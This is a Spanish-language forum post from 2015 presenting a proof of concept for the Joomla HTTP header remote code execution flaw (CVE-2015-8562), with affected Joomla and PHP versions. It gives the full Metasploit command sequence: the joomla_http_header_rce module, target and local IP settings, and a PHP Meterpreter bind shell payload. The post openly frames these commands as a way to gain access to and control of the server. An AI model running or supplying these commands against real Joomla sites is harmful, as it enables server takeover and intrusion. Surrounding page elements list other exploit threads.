comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Joomla 0-Day - HTTP Headers Remote Code Execution - CVE-2015-8562

  • 0 Respuestas
  • 2792 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Franciscodc

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 1
    • Ver Perfil
    • Organizacion Hispana de Ciber Seguridad
  • Twitter: https://twitter.com/OHCSe
« en: Diciembre 26, 2015, 05:10:59 am »
Hola Gente recien me registre en este foro y este es mi tercer post. En esta ocacion por parte de la "OHCS" les traigo la prueba de concepto en la cual aprovechamos la vulnerabilidad de ejecucion remota de joomla, la cual permite ejecutar codigo por medio de las cabeceras y asi poder generar una shell remota que nos dara acceso y control al servidor.

Versiones de Joomla Afectadas : 1.5.0 a 3.4.5
Versiones de PHP Afectadas : Anteriores a 5.4.45

*****************************************************LINKS DESCARGAS NECESARIAS *****************************************************
Joomla Metasploit POC : No tienes permisos para ver links. Registrate o Entra con tu cuenta

Joomla 3.4.5 : No tienes permisos para ver links. Registrate o Entra con tu cuenta

Xampp server con php 5.4.4: No tienes permisos para ver links. Registrate o Entra con tu cuenta


*************************************************************Comandos Utilizados *********************************************************
use exploit/multi/http/joomla_http_header_rce
set RHOST 192.168.0.5
set PAYLOAD php/meterpreter/bind_tcp
set LHOST 192.168.6.174
exploit


Aqui el POC:
« Última modificación: Enero 07, 2016, 10:46:24 am por ANTRAX »
- Cisckoblack

 

¿Te gustó el post? COMPARTILO!



Vulnerabilidad en Kali Linux Sana 2.0 CVE-2015-2008 Auditoria Omar Rodriguez

Iniciado por DaRK UnLiMiTeD

Respuestas: 0
Vistas: 2609
Último mensaje Septiembre 28, 2015, 10:37:40 pm
por DaRK UnLiMiTeD
SQL Injection - Joomla módulo "com_fireboard"

Iniciado por M5f3r0

Respuestas: 0
Vistas: 1688
Último mensaje Agosto 16, 2013, 01:43:18 am
por M5f3r0
CVE-2015-1701 : Windows 7 privilege escalation vulnerability

Iniciado por LionSec

Respuestas: 8
Vistas: 4161
Último mensaje Mayo 22, 2015, 08:02:27 pm
por rand0m
PoC : CVE-2015-1328 - overlayfs local root en ubuntu

Iniciado por LionSec

Respuestas: 7
Vistas: 2979
Último mensaje Junio 19, 2015, 02:46:53 pm
por D3ivid
CVE-2015-1701: Elevar privilegios en Windows

Iniciado por ANTRAX

Respuestas: 1
Vistas: 3478
Último mensaje Julio 20, 2015, 02:41:07 pm
por rand0m